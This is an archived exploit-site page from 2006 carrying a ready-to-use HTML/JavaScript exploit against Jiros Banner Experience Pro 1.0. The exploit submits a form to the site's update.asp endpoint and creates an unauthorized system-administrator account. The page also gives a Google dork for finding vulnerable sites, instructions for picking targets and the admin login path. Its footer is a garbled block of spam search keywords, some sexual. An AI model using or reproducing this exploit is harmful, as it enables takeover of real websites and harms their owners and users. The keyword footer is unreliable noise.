about advertise contact
Search: Home Vulnerabilities Exploits News Articles RSS Feeds Archive

exploits , vulnerabilities , articles , iros Banner Experience 1.0 (Create Admin Bypass) Remote Exploit



2006-03-09 iros Banner Experience 1.0 (Create Admin Bypass) Remote Exploit 
Rated as : High Risk

<html>
<title>Jiros Banner Experience Pro Unauthorized Admin Add
Exploit</title>
<body bgcolor="#000000">
<style>
.xpl {font-family:tahoma; font-size:11px; text-decoration: none;}
</style>
<script language="JavaScript">
function jbxpl() {
  if (document.xplt.victim.value=="") {
    alert("Please enter site!");
    return false;
  }
  if (confirm("Are you sure?")) {
   
xplt.action="http://"+document.xplt.victim.value+"files/update.asp?Action=AddAdmin";
    xplt.aName.value=document.xplt.aName.value;
    xplt.aEmail.value=document.xplt.aEmail.value;
    xplt.aPassword.value=document.xplt.aPassword.value;
    xplt.aIsSystemAdmin=document.xplt.aIsSystemAdmin.value;
    xplt.aIsActive=document.xplt.aIsActive.value;
    xplt.submit();
  }
}
</script>
<strong>
<font class="xpl" color="#00FF40">
<pre>
<center>
Welcome to Jiros Banner Experience Pro Unauthorized Admin Add Exploit
This exploit has been coded by nukedx
You can found original advisory on http://www.nukedx.com/?viewdoc=19
Dork for this exploit: <u>inurl:JBSPro</u>
Your target must be like that: www.victim.com/Path/
The sites you found with given dork has like: www.victim.com/JBSPro/files
or www.victim.com/JBSPro.asp
If the site has /JBSPro/files in link your target must be
www.victim.com/JBSPro/
For second example your target must be www.victim.com/
You can login with your admin account via
www.victim.com/JBSPath/files/login.asp
Have phun
<form name="xplt" method="POST"
onsubmit="jbxpl();">
Target -> <input type="text" name="victim"
value="www.victim.com/Path/" size="44"
class="xpl">
<input type="text" name="aName" value="Enter
Username" class="xpl" size="30">
<input type="text" name="aEmail" value="Enter
Email" class="xpl" size="30">
<input type="text" name="aPassword"
value="Enter Password" class="xpl"
size="30">
<input type="hidden" name="aIsSystemAdmin"
value="True">
<input type="hidden" name="aIsActive"
value="True">
<input type="submit" value="Send"
class="xpl">
</form>
</pre>
</font>
</strong>
</body>
</html>

Save this code as .htm and then execute.
securitydot.net - 2006-03-09

Advertising

Copyright 2007, SecurityDot
Mon, 14 Dec 2009 22:41:34 +0000

Friends : milw0rm.com , secunia.com , securityfocus.com
GOOGLE
NEWS EXPLOITS VULNS
exploits , 0day exploits , newest exploits , vulnerabilities , newest vulnerabilities , 0day vulnerabilities , newest articles , linux articles , articles
Sextoon Photo sexi zeroboard felicity f mambo Remo 777 www.slin8. zeroboard ...t Windo www. kari sweet cartoonxxx Zeroboard Koriyan se www.lagala Www.23sex. Asianude Zeroboard Zeroboard Zeroboard Www.teenba I am seein www.funfor windows xp video pon PHP Advanc cartoonxxx Asianude PHP-Nuke+8 trishabf mambo Remo THIRSA.SEX Arabic sex arpic sex news for c www.zippom news for c Www.monist mambo Remo global ann raten.co 200 /compo arpic sex for sxey Www.sexvid paskistani news for c news for c Sanya www.china-